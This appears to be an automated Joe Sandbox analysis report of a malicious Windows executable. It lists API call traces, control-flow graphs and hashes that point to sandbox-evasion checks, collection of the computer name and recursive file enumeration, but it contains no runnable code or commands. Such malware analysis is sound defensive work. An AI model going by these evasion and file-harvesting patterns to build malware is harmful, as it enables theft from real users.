                                • lstrcpy.KERNEL32(00000000,?), ref: 0100EEC3
                                • StrCmpCA.SHLWAPI(?,ERROR), ref: 0100EEDE
                                • lstrcpy.KERNEL32(00000000,ERROR), ref: 0100EF3F
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy
                                • String ID: ERROR
                                • API String ID: 3722407311-2861137601
                                • Opcode ID: f0a16fd30f1808092b85d391d659afeec5ad78323e1c6ab770dd8674b4b617dc
                                • Instruction ID: 581de8bf05baf82f136054820987cbf6dddca63a7cdd45886ec08fd5d2846213
                                • Opcode Fuzzy Hash: f0a16fd30f1808092b85d391d659afeec5ad78323e1c6ab770dd8674b4b617dc
                                • Instruction Fuzzy Hash: CE21467062014D9BDBB1FF79DC466BE37E4AF10304F005468FA8ADB292DB78D811A790

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2547 ff10c0-ff10cb 2548 ff10d0-ff10dc 2547->2548 2550 ff10de-ff10f3 GlobalMemoryStatusEx 2548->2550 2551 ff10f5-ff1106 2550->2551 2552 ff1112-ff1114 ExitProcess 2550->2552 2553 ff111a-ff111d 2551->2553 2554 ff1108 2551->2554 2554->2552 2555 ff110a-ff1110 2554->2555 2555->2552 2555->2553
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 803317263-2766056989
                                • Opcode ID: f6d7095f21a12cbb88d2606a415cc15e7a6c6f6a766bc9dbdba1257da2af2edc
                                • Instruction ID: d94a5136c3cfce46db961df98151c0b3c2aa2a0f1329979077bd4fa746442ea5
                                • Opcode Fuzzy Hash: f6d7095f21a12cbb88d2606a415cc15e7a6c6f6a766bc9dbdba1257da2af2edc
                                • Instruction Fuzzy Hash: E6F0827051824CDBFB246965984A73DF7DCFF01364F204929DF9AD22A1FA70C880A66B

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2556 1008c88-1008cc4 StrCmpCA 2558 1008cc6-1008cc7 ExitProcess 2556->2558 2559 1008ccd-1008ce6 2556->2559 2561 1008ee2-1008eef call ff2a20 2559->2561 2562 1008cec-1008cf1 2559->2562 2563 1008cf6-1008cf9 2562->2563 2565 1008ec3-1008edc 2563->2565 2566 1008cff 2563->2566 2565->2561 2603 1008cf3 2565->2603 2568 1008d84-1008d92 StrCmpCA 2566->2568 2569 1008da4-1008db8 StrCmpCA 2566->2569 2570 1008d06-1008d15 lstrlen 2566->2570 2571 1008e88-1008e9a lstrlen 2566->2571 2572 1008e6f-1008e7d StrCmpCA 2566->2572 2573 1008d30-1008d3f lstrlen 2566->2573 2574 1008e56-1008e64 StrCmpCA 2566->2574 2575 1008d5a-1008d69 lstrlen 2566->2575 2576 1008dbd-1008dcb StrCmpCA 2566->2576 2577 1008ddd-1008deb StrCmpCA 2566->2577 2578 1008dfd-1008e0b StrCmpCA 2566->2578 2579 1008e1d-1008e2b StrCmpCA 2566->2579 2580 1008e3d-1008e4b StrCmpCA 2566->2580 2568->2565 2584 1008d98-1008d9f 2568->2584 2569->2565 2589 1008d17-1008d1c call ff2a20 2570->2589 2590 1008d1f-1008d2b call ff2930 2570->2590 2594 1008ea4-1008eb0 call ff2930 2571->2594 2595 1008e9c-1008ea1 call ff2a20 2571->2595 2572->2565 2593 1008e7f-1008e86 2572->2593 2596 1008d41-1008d46 call ff2a20 2573->2596 2597 1008d49-1008d55 call ff2930 2573->2597 2574->2565 2592 1008e66-1008e6d 2574->2592 2581 1008d73-1008d7f call ff2930 2575->2581 2582 1008d6b-1008d70 call ff2a20 2575->2582 2576->2565 2585 1008dd1-1008dd8 2576->2585 2577->2565 2586 1008df1-1008df8 2577->2586 2578->2565 2587 1008e11-1008e18 2578->2587 2579->2565 2588 1008e31-1008e38 2579->2588 2580->2565 2591 1008e4d-1008e54 2580->2591 2615 1008eb3-1008eb5 2581->2615 2582->2581 2584->2565 2585->2565 2586->2565 2587->2565 2588->2565 2589->2590 2590->2615 2591->2565 2592->2565 2593->2565 2594->2615 2595->2594 2596->2597 2597->2615 2603->2563 2615->2565 2616 1008eb7-1008eb9 2615->2616 2616->2565 2617 1008ebb-1008ebd lstrcpy 2616->2617 2617->2565
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: 48d1d805d9f81dedad34cc8fbbadd1cc419b38b357175283ef8b82441795eb01
                                • Instruction ID: 200d65c016cad2cdf5fbd23dd3753a39ecffb3c5e8cb2889ec128c228c441aa5
                                • Opcode Fuzzy Hash: 48d1d805d9f81dedad34cc8fbbadd1cc419b38b357175283ef8b82441795eb01
                                • Instruction Fuzzy Hash: 85F06D34610319EFDB249FADD888D16B7F8EF49300F401468F609CB220D274AE00DBA5

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2618 1012ad0-1012b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2619 1012b44-1012b59 2618->2619 2620 1012b24-1012b36 2618->2620
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 01012AFF
                                • RtlAllocateHeap.NTDLL(00000000), ref: 01012B06
                                • GetComputerNameA.KERNEL32(00000000,00000104), ref: 01012B1A
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateComputerNameProcess
                                • String ID:
                                • API String ID: 1664310425-0
                                • Opcode ID: 270114da86c2725df70bbe0d3199f39220afd0a2e05f03067a68ae162501f3a3
                                • Instruction ID: 736e6b39d13ad3f4c20047f333886086ab95181d49ea50c5f113ad88708dff46
                                • Opcode Fuzzy Hash: 270114da86c2725df70bbe0d3199f39220afd0a2e05f03067a68ae162501f3a3
                                • Instruction Fuzzy Hash: 1701D672B44258ABDB20DF99EC49B9DFBB8F744B21F10026AF919D3780D779190087A1
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00FF1046
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00FF104D
                                • ExitProcess.KERNEL32 ref: 00FF1058
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00FF106C
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 00FF10AB
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                                • String ID:
                                • API String ID: 3477276466-0
                                • Opcode ID: a192913010ffdf59068df3c36f1ddc2c9cd9f9003a31357e05e6bbe8b8261065
                                • Instruction ID: 68385d776e4498ba5b0fbe5e6d1804a0fc997c369384c14f694137daed90908b
                                • Opcode Fuzzy Hash: a192913010ffdf59068df3c36f1ddc2c9cd9f9003a31357e05e6bbe8b8261065
                                • Instruction Fuzzy Hash: 82E0CD707843187FEA310B719C0DF1A3A6CDF01B18F100054F300E90D1E5A9A8419B34
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 010023D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 010023F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 01002402
                                • lstrlen.KERNEL32(\*.*), ref: 0100240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 01002436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 0100246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 01002486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 74816846821672f9836f30d0567bbc88fda208862c037f8cd2ac297a60ed0f44
                                • Instruction ID: e635219581b3f1a3928dae81e7d4720dc33109df8d5ac95fb1af16901fb3030d
                                • Opcode Fuzzy Hash: 74816846821672f9836f30d0567bbc88fda208862c037f8cd2ac297a60ed0f44
                                • Instruction Fuzzy Hash: 51A28530901219AFEF72AF79DC8DAAE7BF8AF04704F044068FA45E7295DB78D9419B50
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF16E2
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1719
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF176C
                                • lstrcat.KERNEL32(00000000), ref: 00FF1776
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF17EF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF17F9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1825
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1875
                                • lstrcat.KERNEL32(00000000), ref: 00FF187F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF18AB
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF18F3
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF18FE
                                • lstrlen.KERNEL32(01021794), ref: 00FF1909
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1929
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1935
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF195B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1966
                                • lstrlen.KERNEL32(\*.*), ref: 00FF1971
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF198E
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00FF199A
                                  • Part of subcall function 01014040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0101406D
                                  • Part of subcall function 01014040: lstrcpy.KERNEL32(00000000,?), ref: 010140A2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF19C3
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1A0E
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1A16
                                • lstrlen.KERNEL32(01021794), ref: 00FF1A21
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1A41
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1A4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1A76
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1A81
                                • lstrlen.KERNEL32(01021794), ref: 00FF1A8C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1AAC
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1AB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1ADE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1AE9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1B11
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FF1B45
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FF1B70
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FF1B8A
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1BC4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1BFB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1C03
                                • lstrlen.KERNEL32(01021794), ref: 00FF1C0E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1C31
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1C3D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1C69
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1C74
                                • lstrlen.KERNEL32(01021794), ref: 00FF1C7F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1CA2
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1CAE
                                • lstrlen.KERNEL32(?), ref: 00FF1CBB
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1CDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1CE9
                                • lstrlen.KERNEL32(01021794), ref: 00FF1CF4
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1D14
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1D20
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1D46
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1D51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1D7D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1DE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1DEB
                                • lstrlen.KERNEL32(01021794), ref: 00FF1DF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1E19
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1E25
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1E4B
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF1E56
                                • lstrlen.KERNEL32(01021794), ref: 00FF1E61
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1E81
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF1E8D
                                • lstrlen.KERNEL32(?), ref: 00FF1E9A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1EBA
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1EC8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1EF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF1F3E
                                • GetFileAttributesA.KERNEL32(00000000), ref: 00FF1F45
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FF1F9F
                                • lstrlen.KERNEL32(00D68980), ref: 00FF1FAE
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF1FDB
                                • lstrcat.KERNEL32(00000000,?), ref: 00FF1FE3
                                • lstrlen.KERNEL32(01021794), ref: 00FF1FEE
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF200E
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF201A
                                • lstrcpy.KERNEL32(00000000,?), ref: 00FF2042
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FF204D
                                • lstrlen.KERNEL32(01021794), ref: 00FF2058
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FF2075
                                • lstrcat.KERNEL32(00000000,01021794), ref: 00FF2081
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1389881507.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FF0000, based on PE: true
                                • Associated: 00000001.00000002.1389862600.0000000000FF0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001027000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001086000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.000000000109F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1389881507.0000000001228000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390049877.000000000123A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000123C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000013BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.000000000149D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014C3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390065621.00000000014D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390429731.00000000014DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390542066.0000000001671000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1390561035.0000000001672000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_ff0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                                • String ID: \*.*
                                • API String ID: 4127656590-1173974218
                                • Opcode ID: 2e300bbe66b143de948c1c9023c426ec32e48e2dcd41634b98bb0f62f9d6fdc2
                                • Instruction ID: 967f21ff51d9561af4d6a6e5e0ac8a3fc521520a8d3de9af2eaa7f72d27c954b
                                • Opcode Fuzzy Hash: 2e300bbe66b143de948c1c9023c426ec32e48e2dcd41634b98bb0f62f9d6fdc2
                                • Instruction Fuzzy Hash: 72927E3190121EEBDB31AF64DD89ABE77B9BF40714F040128FA09A7265DB78DD41EB90
                                APIs
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDBEF
                                • lstrlen.KERNEL32(01024CA8), ref: 00FFDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC17
                                • lstrcat.KERNEL32(00000000,01024CA8), ref: 00FFDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDC4C
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDC8F
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00FFDCD0
                                • StrCmpCA.SHLWAPI(?,010217A0), ref: 00FFDCF0
                                • StrCmpCA.SHLWAPI(?,010217A4), ref: 00FFDD0A
                                • lstrlen.KERNEL32(0101CFEC), ref: 00FFDD1D
                                • lstrcpy.KERNEL32(00000000,0101CFEC), ref: 00FFDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00FFDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00FFDD7B
